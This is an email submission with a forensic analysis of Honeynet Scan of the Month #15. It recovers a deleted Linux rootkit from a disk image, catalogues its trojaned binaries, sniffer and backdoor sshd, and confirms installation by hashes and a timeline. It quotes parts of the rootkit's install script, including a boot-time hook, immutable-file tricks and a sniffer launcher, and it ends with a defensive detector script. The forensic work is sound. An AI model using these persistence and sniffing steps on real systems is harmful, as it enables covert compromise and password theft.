From marlonsj@yahoo.com.br Tue May 22 22:41:11 2001
Date: Tue, 22 May 2001 12:02:13 -0300 (ART)
From: Marlon Jabbur
To: project@honeynet.org
Subject: #15 Scan of the Month

Hi,

First I would like to congratulate all of you for such an exciting challenge. And here goes my submission.

TIA
Marlon Jabbur

[ Part 2: "analysis.txt" ]

Introduction

This report attempts to answer the challenge proposed by the Honeynet Project (http://project.honeynet.org) as the #15 Scan of the Month. More information about this challenge can be found at:

* http://project.honeynet.org/scans/
* http://project.honeynet.org/scans/scan15/

The following tools were used to perform this analysis:

* The Coroner's Toolkit (TCT) - http://www.porcupine.org/forensics/tct.html
* Debian GNU/Linux - http://www.debian.org

For installation instructions for the software used in this analysis please refer to the INSTALL file contained in the TCT distribution; for the Debian GNU/Linux installation please refer to the document "Installing Debian GNU/Linux 2.2 for Intel x86", which can be found at http://www.debian.org/releases/2.2/i386/install.

1. Show step by step how you identify and recover the deleted rootkit from the / partition.

To start this work I set up a workspace on the analysis system and downloaded the image from the Honeynet web site. After that I verified the integrity of the copied file, to make sure it was not corrupted during the transfer.
The following commands were issued:

======================================================================
uakti:~# mkdir -p /data/a/m
uakti:~# mkdir /data/a/original
uakti:~# cd /data/a/original
uakti:/data/a/original# wget -q http://project.honeynet.org/scans/scan15/honeynet.tar.gz
uakti:/data/a/original# gzip -dc honeynet.tar.gz | tar xf -
uakti:/data/a/original# ls
honeynet  honeynet.tar.gz
uakti:/data/a/original# md5sum honeynet/honeypot.hda8.dd honeynet.tar.gz
5a8ebf5725b15e563c825be85f2f852e  honeynet/honeypot.hda8.dd
0dff8fb9fe022ea80d8f1a4e4ae33e21  honeynet.tar.gz
======================================================================

These hashes only prove integrity when compared with the values published on the challenge page; a locally computed hash by itself cannot detect a corrupted download.

The bit-image copy was then processed with igrabber.pl (listed in Appendix A), which uses ils to list the inodes of removed files, icat to copy each inode's data blocks into a file named inode.N, and file to record the type of each recovered inode:

======================================================================
uakti:/data/a# ./igrabber.pl -i honeynet/original/honeynet/honeypot.hda8.dd -o inodes.txt
/usr/local/tct/bin/icat: read (512@1807052486656): Success
/usr/local/tct/bin/icat: read (512@1807052486656): Success
/usr/local/tct/bin/icat: read (512@1807052486656): Success
uakti:/data/a#
======================================================================

The three icat warnings come from deleted inodes whose block pointers point to an offset of roughly 1.8 TB, far beyond the end of the partition image (the "Success" is just a stale errno); the inode.N files written for those inodes are incomplete and should not be trusted. Examination of the file inodes.txt, generated by the -o flag of igrabber.pl, shows that the recovered file inode.23 is a gzip archive; decompressing it reveals what appears to be a rootkit.
======================================================================
Script started on Sat May 19 19:44:43 2001
uakti:/data/a# cd inodes
uakti:/data/a/inodes# ls
inode.16110  inode.2043  inode.2048  inode.2053  inode.2061   inode.56231
inode.2039   inode.2044  inode.2049  inode.2054  inode.23     inode.8100
inode.2040   inode.2045  inode.2050  inode.2058  inode.30188  inodes.txt
inode.2041   inode.2046  inode.2051  inode.2059  inode.30191
inode.2042   inode.2047  inode.2052  inode.2060  inode.48284
uakti:/data/a/inodes# cat inodes.txt
inode.16110: ASCII text
inode.2039: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
inode.2040: PCX image data, version 2.5
inode.2041: Bourne shell script text
inode.2042: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.2043: Bourne-Again shell script text
inode.2044: English text
inode.2045: Bourne shell script text
inode.2046: English text
inode.2047: perl script text
inode.2048: English text
inode.2049: data
inode.2050: ASCII text
inode.2051: data
inode.2052: ASCII text
inode.2053: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
inode.2054: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.2058: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.2059: ASCII text
inode.2060: ASCII text
inode.2061: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
inode.23: gzip compressed data, deflated, last modified: Sat Mar 3 00:09:06 2001, os: Unix
inode.30188: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.30191: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.48284: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
inode.56231: ASCII text
inode.8100: English text
inodes.md5: ASCII text
inodes.md5s: ASCII text
inodes.md5s~: ASCII text
uakti:/data/a/inodes# tar zxvf inode.23
last/
tar: Archive contains future timestamp 2002-02-08 11:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
uakti:/data/a/inodes#
======================================================================

Close examination of the extracted files shows that this is indeed a rootkit: it replaces system binaries, installs a backdoor for the intruder, and mails the intruder information about the newly rooted system. It is also worth noting that comparing the md5sums of the files contained in inode.23 with the other recovered inodes shows that most of them are either the rootkit's own files (unpacked and then deleted when the install script removed itself) or the original system binaries that the rootkit replaced.
This is shown below:

======================================================================
md5sum                            recovered inode  rootkit file
06d04fa3c4941b398756d029de75770e  inode.2060       last/s
115f438631de8d0a7c03c9d458eb7257  inode.23         lk.tgz - the rootkit package itself
12e8748c19abe7a44e67196c22738e9b  inode.2043       last/cleaner
18a2d7d3178f321b881e7c493af72996  inode.2061       last/mkxfs
202a51b16ac8d1b4dc75de89e7344ed4  inode.2054       last/last.cgi
21ed3ca31a9c9b51a757f1644e26f2f7  inode.2039       last/ssh
312de877e5180678cd54606e1c25af40  inode.2052       last/sshd_config
464dc23cac477c43418eb8d3ef087065  inode.2047       last/sense
4cfae8c44a6d1ede669d41fc320c7325  inode.2053       last/sl2
54e41f035e026f439d4188759b210f07  inode.2046       last/services
5e1725f2734365fef9e55398785f3033  inode.30191      original /bin/ps replaced by the rootkit
5f22ceb87631fbcbf32e59234feeaa5b  inode.2059       last/logclear
5fd2ce512e0eba4d090191e8a1518808  inode.2048       last/ssh_config
68b329da9893e34099c7d8ad5cb9c940  inode.2040       last/pidfile
8ff0939cd49a0b2ef3156c7876afca4b  inode.2058       last/top
964db5da8cf89810a54659b6fdb81958  inode.2041       last/install
ad265d3c07dea3151bacb6930e0b72d3  inode.2051       last/ssh_random_seed
b52af438845c776cde94f67e19cd037a  inode.48284      original /sbin/ifconfig replaced by the rootkit
b63485e42035328c0d900a71ff2e6bd7  inode.2044       last/inetd.conf
c2c1b08498ed71a908c581d634832672  inode.2049       last/ssh_host_key
dfb2eeea2a5ba23eb6a2b9d0cff9d82f  inode.2045       last/lsattr
e76cd5baaab7b4f28c999946a9cb4dcc  inode.2050       last/ssh_host_key.pub
f174e862d00d0998c3fa4ccd632019b5  inode.30188      original /bin/netstat replaced by the rootkit
======================================================================

One caveat on the file(1) output above: the "PCX image data" verdict for inode.2040 (last/pidfile) is a false positive. Its md5sum, 68b329da9893e34099c7d8ad5cb9c940, is the hash of a single newline, and the newline byte (0x0a) happens to be the PCX magic number. Types reported by file for such tiny recovered inodes should always be checked against the content.

2. What files make up the deleted rootkit?

Several of the files described below are the same ones analyzed in the #13 Scan of the Month (the file xzibit.tar.gz that was installed by that challenge's auto-rooter); the descriptions refer to that analysis where the files match. The rootkit installed on the compromised system is composed of the following files:

last/cleaner - A log cleaner; it takes as argument the string that will be removed from the log files.
last/ifconfig - A trojaned version of ifconfig that hides the promiscuous state of an interface.

last/inetd.conf - A configuration file for the inetd super daemon. It enables the normal telnet daemon and a POP-3 daemon pointing to /usr/cyrus/bin/pop3d, which normally does not exist on Red Hat systems and is not installed by this rootkit, and it disables the default services started by a Red Hat 6.2 system.

last/install - The script used to install the rootkit. It performs the following actions:

1. Replaces the system binaries ifconfig, ps, top and netstat.
2. Creates the configuration files /dev/rpm and /dev/last, which are meant to tell the trojaned binaries which connections and processes of the intruder to hide. Note that although this appears to be the intruder's intention, the netstat, top and ps binaries in the kit contain no reference to these files; the strings in them point to /dev/dsx and /dev/caca instead.
3. Creates two hidden directories, /dev/ida/.drag-on and /dev/ida/".. " (dot, dot, space), and copies the intruder's tools (ssh, linsniffer, sense and their configuration files) into them.
4. Replaces the system's /etc/inetd.conf and /etc/services and appends a line to /etc/rc.d/rc.sysinit that executes /usr/bin/lsattr, the script responsible for starting the sniffer and the trojaned ssh daemon.
5. Searches the system for common cgi-bin directories and, if any are found, copies last.cgi into them.
6. Finally, gathers information about the system, mails it to last@linuxmail.org and bidi_damm@hotmail.com, and removes itself.

last/last.cgi - A CGI program used by the intruder to execute arbitrary commands on the compromised machine; this file is the same becys.cgi analyzed in the #13 Scan of the Month.
last/linsniffer - A common network sniffer that looks for passwords sent in the clear over the network; it can be found in lrk4 (Linux Rootkit version 4).

last/logclear - A shell script used to clean the linsniffer logs.

last/lsattr - The shell script used to start the sniffer and the sshd (ssh daemon) installed by the intruder; it is executed by the install script and, at every boot, by /etc/rc.d/rc.sysinit.

last/mkxfs - A trojaned ssh daemon used by the intruder to access the system.

last/netstat, last/ps, last/ifconfig - Trojaned versions used to hide the intruder's connections and processes. As noted above, these binaries make no reference to the configuration files created by the install script (/dev/rpm and /dev/last); the strings found in them show that they use /dev/dsx and /dev/caca. These files are also the same ones analyzed in the #13 Scan of the Month.

last/top - The trojaned top, installed by the install script alongside ps, netstat and ifconfig.

last/s, last/sshd_config - sshd configuration files; only last/s is used by the rootkit.

last/sense - A perl script that sorts the output file generated by linsniffer.

last/services - The services database, with an extra alias, /usr/sbin/sshd, on the ssh/udp entry. I could not find a reference to this in any of the programs packaged in the rootkit.

last/sl2 - A DoS tool that SYN floods the target; it is the same one analyzed in the #13 Scan of the Month.

last/ssh, last/ssh_config - The client side of the ssh suite and its configuration file.

last/ssh_host_key, last/ssh_host_key.pub, last/ssh_random_seed - Files used by sshd to store its host key and the random seed used by its cryptography.

3. Was the rootkit ever actually installed on the system? How do you know?

Yes, the rootkit was installed on the system.
This can be verified by looking at the files the install script puts in place. One of its first actions is to replace the system binaries ps, netstat, top and ifconfig; comparing the md5 hashes of the installed binaries with the copies in the recovered package confirms the replacement. The image is mounted read-only (and nodev,noexec), so examining it does not disturb the access times that the timeline later in this section depends on.

======================================================================
uakti:/data/a/inodes# cd last
uakti:/data/a/inodes/last# mount -o loop,ro,nodev,noexec /data/a/original/honeynet/honeypot.hda8.dd /data/a/m
uakti:/data/a/inodes/last# md5sum ps /data/a/m/bin/ps
7728c15d89f27e376950f96a7510bf0f  ps
7728c15d89f27e376950f96a7510bf0f  /data/a/m/bin/ps
uakti:/data/a/inodes/last# md5sum netstat /data/a/m/bin/netstat
2b07576213c1c8b942451459b3dc4903  netstat
2b07576213c1c8b942451459b3dc4903  /data/a/m/bin/netstat
uakti:/data/a/inodes/last# md5sum ifconfig /data/a/m/sbin/ifconfig
086394958255553f6f38684dad97869e  ifconfig
086394958255553f6f38684dad97869e  /data/a/m/sbin/ifconfig
uakti:/data/a/inodes/last#
======================================================================

After replacing the system binaries, the install script creates the two configuration files /dev/rpm and /dev/last. Both are present in the image's /dev directory, with exactly the contents the script writes (the script's messages are Romanian: "Gata" means "done").

======================================================================
uakti:/data/a/inodes/last# cat install
.....
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
....
uakti:/data/a/inodes/last# cat /data/a/m/dev/rpm
3 sl2
3 sshdu
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
3 psybnc
uakti:/data/a/inodes/last# cat /data/a/m/dev/last
1 193.231.139
1 213.154.137
1 193.254.34
3 48744
3 3666
3 31221
3 22546
4 48744
4 2222
uakti:/data/a/inodes/last#
======================================================================

After creating the configuration files, the install script creates the two directories /dev/ida/.drag-on and /dev/ida/".. ", copies the files linsniffer, logclear, sense, sl2, mkxfs, s, ssh_host_key and ssh_random_seed into them, creates the sniffer log tcp.log, and copies the inetd.conf configuration file and the services database into the system's /etc. Below we verify the presence of these files and the md5 hashes of inetd.conf and services. Two timestamps in the .drag-on listing deserve attention: tcp.log is 138 bytes and was last written on Mar 16 13:28, and ssh_random_seed was rewritten on Mar 16 11:45, the day after the installation. The copies in ".. " have neither change. Since lsattr runs linsniffer and mkxfs from .drag-on, this shows that the sniffer actually captured traffic and that the trojaned sshd, which rewrites its seed file while running, was up.

======================================================================
uakti:/data/a/inodes/last# ls -l /data/a/m/dev/ida/.drag-on/
total 647
-rwx------   1 root     root         7165 Mar 15 22:45 linsniffer
-rwx------   1 root     root           75 Mar 15 22:45 logclear
-rwxr-xr-x   1 root     root       632066 Mar 15 22:45 mkxfs
-rw-r--r--   1 root     root          708 Mar 15 22:45 s
-rwxr-xr-x   1 root     root         4060 Mar 15 22:45 sense
-rwx------   1 root     root         8268 Mar 15 22:45 sl2
-rw-------   1 root     root          540 Mar 15 22:45 ssh_host_key
-rw-------   1 root     root          512 Mar 16 11:45 ssh_random_seed
-rw-r--r--   1 root     root          138 Mar 16 13:28 tcp.log
uakti:/data/a/inodes/last# ls -l /data/a/m/dev/ida/".. "
total 646
-rwx------   1 root     root         7165 Mar 15 22:45 linsniffer
-rwx------   1 root     root           75 Mar 15 22:45 logclear
-rwxr-xr-x   1 root     root       632066 Mar 15 22:45 mkxfs
-rw-r--r--   1 root     root          708 Mar 15 22:45 s
-rwxr-xr-x   1 root     root         4060 Mar 15 22:45 sense
-rwx------   1 root     root         8268 Mar 15 22:45 sl2
-rw-------   1 root     root          540 Mar 15 22:45 ssh_host_key
-rw-------   1 root     root          512 Mar 15 22:45 ssh_random_seed
-rw-r--r--   1 root     root            0 Mar 15 22:45 tcp.log
uakti:/data/a/inodes/last# md5sum inetd.conf /data/a/m/etc/inetd.conf
b63485e42035328c0d900a71ff2e6bd7  inetd.conf
b63485e42035328c0d900a71ff2e6bd7  /data/a/m/etc/inetd.conf
uakti:/data/a/inodes/last# md5sum services /data/a/m/etc/services
54e41f035e026f439d4188759b210f07  services
54e41f035e026f439d4188759b210f07  /data/a/m/etc/services
uakti:/data/a/inodes/last#
======================================================================

Later the install script appends a line to /etc/rc.d/rc.sysinit that executes the script /usr/bin/lsattr, which starts the sniffer and the ssh daemon installed by the rootkit on every boot. Note that the kit first deletes the real /usr/bin/lsattr (the e2fsprogs utility), installs its own script in its place and makes it immutable with chattr +i, so lsattr on the compromised host can no longer be trusted to report file attributes; use a copy from known-good media. The arguments "-t1 -X53 -p" are cosmetic, so that the line looks like a legitimate lsattr invocation; the script ignores them. We can verify the appended line by looking at the end of /etc/rc.d/rc.sysinit:

======================================================================
uakti:/data/a/inodes/last# cat install
...
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
....
uakti:/data/a/inodes/last# tail /data/a/m/etc/rc.d/rc.sysinit
...
/sbin/getkey i && touch /var/run/confirm
fi
wait
/usr/bin/lsattr -t1 -X53 -p

uakti:/data/a/inodes/last# cat lsattr
#!/bin/sh
cd /dev/ida/.drag-on
./mkxfs -f ./s
./linsniffer >> ./tcp.log &
cd /
uakti:/data/a/inodes/last#
======================================================================

Besides the install script, to confirm the installation of the rootkit we also analyze the modify/access/change (MAC) timestamps of the filesystem, looking for signs of activity. We use ils and ils2mac to collect the timestamps of the deleted inodes, and grave-robber (-m) to collect the timestamps of the live files from the mounted image; mactime then merges both body files into a single timeline of all activity on the system from 03/15/2001 onward. The -p and -g flags hand mactime the passwd and group files from the image, so uids and gids resolve to the compromised host's names rather than the analysis host's. The following commands were used:

======================================================================
uakti:/data/a# mkdir gr
uakti:/data/a# export PATH=$PATH:/usr/local/tct/bin
uakti:/data/a# grave-robber -c m -m -d gr -o LINUX2
uakti:/data/a# ils original/honeynet/honeypot.hda8.dd | ils2mac > ils.body
uakti:/data/a# mkdir mactimes
uakti:/data/a# cat ils.body gr/body > mactimes/body.full
uakti:/data/a# cd mactimes
uakti:/data/a/mactimes# mactime -p /data/a/m/etc/passwd -g /data/a/m/etc/group -b body.full 03/15/2001 > mactimes.txt
uakti:/data/a/mactimes#
======================================================================

Analyzing the resulting timeline, we see that inode 23 (the rootkit package) was last modified at March 15 22:36:48, which is when the intruder downloaded the package to the compromised machine. At 22:44:50 the package was read and unpacked, and at 22:45:02 the install script (inode 2041) ran: we see the access to the chown utility and the copying of the rootkit files into the system. At 22:45:03 the file /etc/rc.d/rc.sysinit is modified.
Finally, at 22:45:05 and 22:46:09 we see accesses to /bin/mail, /bin/df, /etc/sendmail.cf and /etc/sendmail.cw, which correspond to the last part of the install script, where it mails information about the machine to the intruder. All this activity is shown below. Lines without a path are deleted inodes reported by ils; the 520333-byte entry is inode 23, the rootkit tarball. The 1024-byte directory m/dev/ida/.. at 22:45:03 is the ".. " directory itself, and the accesses to the e2fsprogs libraries (libcom_err, libe2p, libext2fs) in the same second are consistent with the chattr +i in the install script. Paths are prefixed with m/ because grave-robber was run against the mount point with -c m.

======================================================================
Mar 15 01 22:36:48   520333 m.. -rw-r--r-- root root
Mar 15 01 22:44:50   611931 .a. -rwxr-xr-x root root
                          1 .a. -rw-r--r-- root root
                       1345 .a. -rwxr-xr-x root root
                        880 .a. -rw-r--r-- root root
                        344 .a. -rw-r--r-- root root
                        688 .a. -rw-r--r-- root root
                     520333 .a. -rw-r--r-- root root
                      35300 .a. -rwxr-xr-x root root m/bin/netstat
                      33280 .a. -rwxr-xr-x root root m/bin/ps
Mar 15 01 22:45:02     4060 .a. -rwxr-xr-x root root
                       8268 .a. -rwx------ root root
                      53588 .ac -rwxr-xr-x root root
                         75 .a. -rwx------ root root
                      66736 ..c -rwxr-xr-x root root
                      60080 ..c -r-xr-xr-x root root
                      42736 ..c -rwxr-xr-x root root
                       2048 m.c drwxr-xr-x root root m/bin
                      11952 .a. -rwxr-xr-x root root m/bin/chown
                      35300 ..c -rwxr-xr-x root root m/bin/netstat
                      33280 ..c -rwxr-xr-x root root m/bin/ps
                      34816 m.c drwxr-xr-x root root m/dev
                      12288 m.c drwxrwxr-x root root m/dev/ida
                       7165 mac -rwx------ root root m/dev/ida/.. /linsniffer
                         75 mac -rwx------ root root m/dev/ida/.. /logclear
                     632066 .a. -rwxr-xr-x root root m/dev/ida/.. /mkxfs
                       4060 mac -rwxr-xr-x root root m/dev/ida/.. /sense
                       8268 mac -rwx------ root root m/dev/ida/.. /sl2
                       7165 m.c -rwx------ root root m/dev/ida/.drag-on/linsniffer
                         75 mac -rwx------ root root m/dev/ida/.drag-on/logclear
                     632066 m.c -rwxr-xr-x root root m/dev/ida/.drag-on/mkxfs
                        708 m.c -rw-r--r-- root root m/dev/ida/.drag-on/s
                       4060 mac -rwxr-xr-x root root m/dev/ida/.drag-on/sense
                       8268 mac -rwx------ root root m/dev/ida/.drag-on/sl2
                        540 m.c -rw------- root root m/dev/ida/.drag-on/ssh_host_key
                         87 mac -rw-r--r-- root root m/dev/last
                         71 mac -rw-r--r-- root root m/dev/rpm
                       3072 m.c drwxr-xr-x root root m/sbin
                      19840 ..c -rwxr-xr-x root root m/sbin/ifconfig
Mar 15 01 22:45:03     3278 .a. -rw-r--r-- root root
                         79 .a. -rwxr-xr-x root root
                      11407 .a. -rw-r--r-- root root
                       4060 ..c -rwxr-xr-x root root
                        540 .ac -rw------- root root
                        512 .ac -rw------- root root
                       8268 ..c -rwx------ root root
                         75 ..c -rwx------ root root
                        708 .ac -rw-r--r-- root root
                     632066 .ac -rwxr-xr-x root root
                      33392 .a. -rwxr-xr-x root root m/bin/cp
                       5760 .a. -rwxr-xr-x root root m/bin/sleep
                       1024 m.c drwxr-xr-x root root m/dev/ida/..
                     632066 m.c -rwxr-xr-x root root m/dev/ida/.. /mkxfs
                        708 mac -rw-r--r-- root root m/dev/ida/.. /s
                        540 mac -rw------- root root m/dev/ida/.. /ssh_host_key
                        512 mac -rw------- root root m/dev/ida/.. /ssh_random_seed
                          0 mac -rw-r--r-- root root m/dev/ida/.. /tcp.log
                       1024 m.c drwxr-xr-x root root m/dev/ida/.drag-on
                       7165 .a. -rwx------ root root m/dev/ida/.drag-on/linsniffer
                     632066 .a. -rwxr-xr-x root root m/dev/ida/.drag-on/mkxfs
                        708 .a. -rw-r--r-- root root m/dev/ida/.drag-on/s
                        540 .a. -rw------- root root m/dev/ida/.drag-on/ssh_host_key
                        512 .a. -rw------- root root m/dev/ida/.drag-on/ssh_random_seed
                        138 .a. -rw-r--r-- root root m/dev/ida/.drag-on/tcp.log
                       3072 m.c drwxr-xr-x root root m/etc
                       3278 mac -rw-r--r-- root root m/etc/inetd.conf
                      13708 m.c -rwxr-xr-x root root m/etc/rc.d/rc.sysinit
                      11407 m.c -rw-r--r-- root root m/etc/services
                         17 .a. lrwxrwxrwx root root m/lib/libcom_err.so.2 -> libcom_err.so.2.0
                       8465 .a. -rwxr-xr-x root root m/lib/libcom_err.so.2.0
                         13 .a. lrwxrwxrwx root root m/lib/libe2p.so.2 -> libe2p.so.2.3
                      17713 .a. -rwxr-xr-x root root m/lib/libe2p.so.2.3
                         16 .a. lrwxrwxrwx root root m/lib/libext2fs.so.2 -> libext2fs.so.2.4
                      85856 .a. -rwxr-xr-x root root m/lib/libext2fs.so.2.4
Mar 15 01 22:45:05        0 mac drwxr-xr-x 1031 users
                     611931 ..c -rwxr-xr-x root root
                          1 ..c -rw-r--r-- root root
                       3713 .ac -rwx------ root root
                        796 mac -rw-r--r-- root root
                       1345 ..c -rwxr-xr-x root root
                       3278 ..c -rw-r--r-- root root
                         79 ..c -rwxr-xr-x root root
                      11407 ..c -rw-r--r-- root root
                        880 ..c -rw-r--r-- root root
                        344 ..c -rw-r--r-- root root
                        688 ..c -rw-r--r-- root root
                       4620 .ac -rwxr-xr-x root root
                     520333 ..c -rw-r--r-- root root
                      24816 .a. -rwxr-xr-x root root m/bin/df
                      62384 .a. -rwxr-xr-x root mail m/bin/mail
                         51 .a. -rw-r--r-- root root m/etc/conf.modules
                        112 .a. -rw-r--r-- root root m/etc/mail.rc
                         17 .a. lrwxrwxrwx root root m/lib/ld-linux.so.1 -> ld-linux.so.1.9.5
                      25386 .a. -rwxr-xr-x root root m/lib/ld-linux.so.1.9.5
                     788401 .a. -rwxr-xr-x root root m/lib/libdb-2.1.3.so
                         14 .a. lrwxrwxrwx root root m/lib/libdb.so.3 -> libdb-2.1.3.so
                      44108 .a. -rwxr-xr-x root root m/lib/libproc.so.2.0.6
                      28633 .a. -rw-r--r-- root root m/lib/modules/2.2.14-5.0/modules.dep
                      19840 .a. -rwxr-xr-x root root m/sbin/ifconfig
                          6 .a. lrwxrwxrwx root root m/sbin/modprobe -> insmod
Mar 15 01 22:46:09    34181 .a. -rw-r--r-- root root m/etc/sendmail.cf
                         59 .a. -rw-r--r-- root root m/etc/sendmail.cw
======================================================================

Appendix A. The igrabber.pl script

This is a very simple script written to automate the process of listing the removed inodes of an image (using ils), copying their contents (using icat) and determining their type (using file). To run this script you need perl and a working copy of TCT, and you must adjust the variables ICAT, ILS and FILE to the appropriate locations on your system. The script accepts the following flags:

-i image_file
    This is the only mandatory flag; it names the image file to be analyzed.
-p prefix
    Specifies the prefix of the inode files written by icat (default: inode).

-o output_file
    By default igrabber.pl prints the type of each copied inode to stdout; with this flag the output goes to the file specified instead.

########################################
#### Begin of igrabber.pl
########################################
#!/usr/bin/perl -w
#
# igrabber.pl - list the removed inodes of an image with ils, copy the
# data blocks of each one to <prefix>.<inode> with icat, and report the
# file(1) type of every copy.
use strict;
use Getopt::Std;

# Adjust these to where TCT is installed on your system.
my $ICAT = '/usr/local/tct/bin/icat';
my $ILS  = '/usr/local/tct/bin/ils';
my $FILE = '/usr/local/tct/bin/file';

sub usage() {
    print "$0 -i image_file_name [-p prefix] [-o output_file]\n";
    exit 1;
}

my %options;
my $prefix;

getopt('oip', \%options);
$options{'i'} or usage();
$prefix = $options{'p'} || 'inode';

# With -o, the file(1) report goes to a file instead of stdout.
if ( $options{'o'} ) {
    open (STDOUT, ">$options{o}") or die ("Couldn't open file $options{o}: $!");
}

# ils lists removed inodes by default, one pipe-separated record per line
# with the inode number in the first field; its header lines do not start
# with a digit and are skipped.
open (INODES, "$ILS $options{i}|") or die ("Couldn't create pipe: $!");
while (<INODES>) {
    my ($inode) = split /\|/;
    next unless ( $inode =~ /^\d+/);
    system ("$ICAT $options{i} $inode > $prefix.$inode");
    my $output = `$FILE $prefix.$inode`;
    print $output;
}
close(INODES);
exit 0;
########################################
#### End of igrabber.pl
########################################
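Appendix B. Checking an image for the rootkit's on-disk traces (added example)

The Python script below is an added example written for this edited page; it is not part of the original submission and not TCT code. It automates two of the checks performed by hand in question 3 on the image mounted at /data/a/m: it walks /dev for entries that do not belong in a device directory (the kit's configuration files /dev/rpm and /dev/last and its hidden directories /dev/ida/.drag-on and /dev/ida/".. "), and it compares the installed ps, netstat, ifconfig and top with the copies in the recovered kit directory to see which ones were actually replaced. The install path of top (usr/bin/top) is an assumption; the analysis gives paths only for ps, netstat and ifconfig. The tree built by build_sample_tree() is constructed for a dry run and contains no data from the honeypot image.

```python
"""Find the on-disk traces of the 'last' rootkit on a mounted, read-only image.

Added example; not part of the original submission and not TCT code.
"""
import hashlib
import os
import stat
import tempfile

# Kit member -> install path relative to the image root. ps, netstat and
# ifconfig follow the install script quoted in the analysis; usr/bin/top is
# an assumption (where procps puts top on Red Hat 6.2).
KIT_TARGETS = {"ps": "bin/ps", "netstat": "bin/netstat",
               "ifconfig": "sbin/ifconfig", "top": "usr/bin/top"}


def odd_dev_entries(root):
    """Return (path relative to root, reason) for every entry below root/dev that
    is a regular file, has a hidden (dot-prefixed) name, or has a name padded with
    whitespace. Device nodes, fifos, sockets, symlinks and ordinary subdirectories
    such as /dev/ida or /dev/pts are left alone. Modern systems keep a few
    legitimate hidden entries (e.g. /dev/.udev); allow-list those before use."""
    hits = []
    dev = os.path.join(root, "dev")
    for dirpath, dirnames, filenames in os.walk(dev):
        for name in sorted(dirnames + filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode      # lstat: never follow a planted symlink
            if name.startswith("."):
                hits.append((rel, "hidden name under /dev"))
            elif name != name.strip():
                hits.append((rel, "name padded with whitespace"))
            elif stat.S_ISREG(mode):
                hits.append((rel, "regular file under /dev"))
    return hits


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def trojaned_binaries(root, kit_dir, targets=KIT_TARGETS):
    """Install paths (relative to root) whose contents are byte-identical to the
    corresponding kit member, i.e. the binaries the install script replaced.
    A file missing on either side is simply not a match."""
    replaced = []
    for member, rel in sorted(targets.items()):
        kit_file, installed = os.path.join(kit_dir, member), os.path.join(root, rel)
        if (os.path.isfile(kit_file) and os.path.isfile(installed)
                and sha256_of(kit_file) == sha256_of(installed)):
            replaced.append(rel)
    return replaced


def build_sample_tree():
    """Fabricate a tiny image root and kit directory (constructed data, not the
    honeypot image). Returns (image_root, kit_dir)."""
    base = tempfile.mkdtemp(prefix="scan15-")
    root, kit = os.path.join(base, "m"), os.path.join(base, "last")

    def put(path, data):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

    fake = {n: b"\x7fELF fake " + n.encode() for n in KIT_TARGETS}
    for name, data in fake.items():
        put(os.path.join(kit, name), data)
    put(os.path.join(root, "bin", "ps"), fake["ps"])                      # replaced
    put(os.path.join(root, "bin", "netstat"), fake["netstat"])            # replaced
    put(os.path.join(root, "sbin", "ifconfig"), b"\x7fELF original ifconfig")  # untouched
    # deliberately no usr/bin/top in this tree
    put(os.path.join(root, "dev", "rpm"), b"3 sl2\n3 sshdu\n")
    put(os.path.join(root, "dev", "last"), b"1 193.231.139\n")
    put(os.path.join(root, "dev", "ida", ".drag-on", "linsniffer"), b"\x7fELF")
    put(os.path.join(root, "dev", "ida", ".. ", "tcp.log"), b"")
    if hasattr(os, "mkfifo"):
        os.mkfifo(os.path.join(root, "dev", "initctl"))  # non-regular: must not be reported
    return root, kit


if __name__ == "__main__":
    image_root, kit_dir = build_sample_tree()
    for rel, why in odd_dev_entries(image_root):
        print(f"{why:28} {rel}")
    print("replaced:", trojaned_binaries(image_root, kit_dir))
```

Run it as-is for the dry run, or call odd_dev_entries('/data/a/m') and trojaned_binaries('/data/a/m', '/data/a/inodes/last') against the mounted image. The /dev walk deliberately ignores subdirectories themselves (the kit hid inside the legitimate /dev/ida) and instead reports what should never be there: regular files, dot-names and names padded with spaces.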
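Appendix C. Building a mactime-style timeline from body files (added example)

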